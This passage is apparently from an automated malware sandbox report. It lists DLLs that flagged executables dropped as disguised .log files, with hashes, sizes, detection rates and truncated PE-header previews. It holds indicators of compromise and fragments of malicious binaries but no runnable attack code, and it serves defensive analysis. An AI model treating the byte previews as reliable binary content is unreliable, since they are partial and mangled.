MD5:	00574FB20124EAFD40DC945EC86CA59C
SHA1:	8B96C4B6F450E711085AE7B22517C195222ACFDF
SHA-256:	3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
SHA-512:	B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

C:\Users\user\Desktop\WaJXtmYR.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\WdCFCCCo.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	38400
Entropy (8bit):	5.699005826018714
Encrypted:	false
SSDEEP:	768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
MD5:	87765D141228784AE91334BAE25AD743
SHA1:	442BA48B1B5BB158E2E6145B0592F81D20CB9C57
SHA-256:	9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
SHA-512:	77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\XHQMeNzh.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	40448
Entropy (8bit):	5.7028690200758465
Encrypted:	false
SSDEEP:	768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
MD5:	51B1964F31C557AE8C2B01EA164ABD9F
SHA1:	97C6E8FD1F21D644281FAF82D017969FE22423E4
SHA-256:	AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
SHA-512:	5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 12%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\XkYexKxm.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	342528
Entropy (8bit):	6.170134230759619
Encrypted:	false
SSDEEP:	3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
MD5:	9DADB5C8A6FD5020275C31EE6BC61D63
SHA1:	ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
SHA-256:	80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
SHA-512:	EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\XoywUTAh.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	40448
Entropy (8bit):	5.7028690200758465
Encrypted:	false
SSDEEP:	768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
MD5:	51B1964F31C557AE8C2B01EA164ABD9F
SHA1:	97C6E8FD1F21D644281FAF82D017969FE22423E4
SHA-256:	AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
SHA-512:	5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 12%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\YNJWsoOG.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	342528
Entropy (8bit):	6.170134230759619
Encrypted:	false
SSDEEP:	3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
MD5:	9DADB5C8A6FD5020275C31EE6BC61D63
SHA1:	ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
SHA-256:	80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
SHA-512:	EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\YksUcbqD.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	50176
Entropy (8bit):	5.723168999026349
Encrypted:	false
SSDEEP:	768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
MD5:	2E116FC64103D0F0CF47890FD571561E
SHA1:	3EF08A9B057D1876C24FC76E937CDA461FAC6071
SHA-256:	25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
SHA-512:	39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 21%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\ZQQluKfk.log

Download File

Process:	C:\Users\user\Desktop\FuWRu2Mg82.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	34304
Entropy (8bit):	5.618776214605176
Encrypted:	false
SSDEEP:	768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
MD5:	9B25959D6CD6097C0EF36D2496876249
SHA1:	535B4D0576746D88537D4E9B01353210D893F4D2
SHA-256:	4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
SHA-512:	C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t\|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\ZUMnkmBH.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	70144
Entropy (8bit):	5.909536568846014
Encrypted:	false
SSDEEP:	1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
MD5:	E4FA63649F1DBD23DE91861BB39C317D
SHA1:	25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
SHA-256:	CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
SHA-512:	C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\ZfooXlGj.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	39936
Entropy (8bit):	5.660491370279985
Encrypted:	false
SSDEEP:	768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
MD5:	240E98D38E0B679F055470167D247022
SHA1:	49888CCED719AE78EE3BAE2959402749668AA1C6
SHA-256:	C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
SHA-512:	93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-\|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\ZqkeqCFc.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	34816
Entropy (8bit):	5.636032516496583
Encrypted:	false
SSDEEP:	384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
MD5:	996BD447A16F0A20F238A611484AFE86
SHA1:	CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
SHA-256:	0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
SHA-512:	80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\ZuAdpowF.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	39936
Entropy (8bit):	5.660491370279985
Encrypted:	false
SSDEEP:	768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
MD5:	240E98D38E0B679F055470167D247022
SHA1:	49888CCED719AE78EE3BAE2959402749668AA1C6
SHA-256:	C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
SHA-512:	93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-\|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\aTWLrgjG.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	6.057993947082715
Encrypted:	false
SSDEEP:	3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
MD5:	16B480082780CC1D8C23FB05468F64E7
SHA1:	6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
SHA-256:	7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
SHA-512:	A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

C:\Users\user\Desktop\adnNjHjk.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	40448
Entropy (8bit):	5.7028690200758465
Encrypted:	false
SSDEEP:	768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
MD5:	51B1964F31C557AE8C2B01EA164ABD9F
SHA1:	97C6E8FD1F21D644281FAF82D017969FE22423E4
SHA-256:	AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
SHA-512:	5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\adtLbSCC.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\bEzNzlOz.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	46592
Entropy (8bit):	5.870612048031897
Encrypted:	false
SSDEEP:	768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
MD5:	3601048DFB8C4A69313A593E74E5A2DE
SHA1:	A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
SHA-256:	F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
SHA-512:	B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\bNbWVinF.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	50176
Entropy (8bit):	5.723168999026349
Encrypted:	false
SSDEEP:	768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
MD5:	2E116FC64103D0F0CF47890FD571561E
SHA1:	3EF08A9B057D1876C24FC76E937CDA461FAC6071
SHA-256:	25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
SHA-512:	39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\bYEWJish.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	40448
Entropy (8bit):	5.7028690200758465
Encrypted:	false
SSDEEP:	768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
MD5:	51B1964F31C557AE8C2B01EA164ABD9F
SHA1:	97C6E8FD1F21D644281FAF82D017969FE22423E4
SHA-256:	AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
SHA-512:	5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\bdHDOXcB.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	6.057993947082715
Encrypted:	false
SSDEEP:	3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
MD5:	16B480082780CC1D8C23FB05468F64E7
SHA1:	6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
SHA-256:	7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
SHA-512:	A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

C:\Users\user\Desktop\bmeDyKvy.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33280
Entropy (8bit):	5.634433516692816
Encrypted:	false
SSDEEP:	384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
MD5:	0D323E1CACEA89CAA5DDEAF2F37BCA69
SHA1:	4769C3E947D02A1FD548BE64013F520D571D96E1
SHA-256:	873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
SHA-512:	73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................\|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\cGGcCHge.log

Download File

Process:	C:\Users\user\Desktop\FuWRu2Mg82.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\cYNuQcag.log

Download File

Process:	C:\Users\user\Desktop\FuWRu2Mg82.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	342528
Entropy (8bit):	6.170134230759619
Encrypted:	false
SSDEEP:	3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
MD5:	9DADB5C8A6FD5020275C31EE6BC61D63
SHA1:	ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
SHA-256:	80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
SHA-512:	EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
Malicious:	true
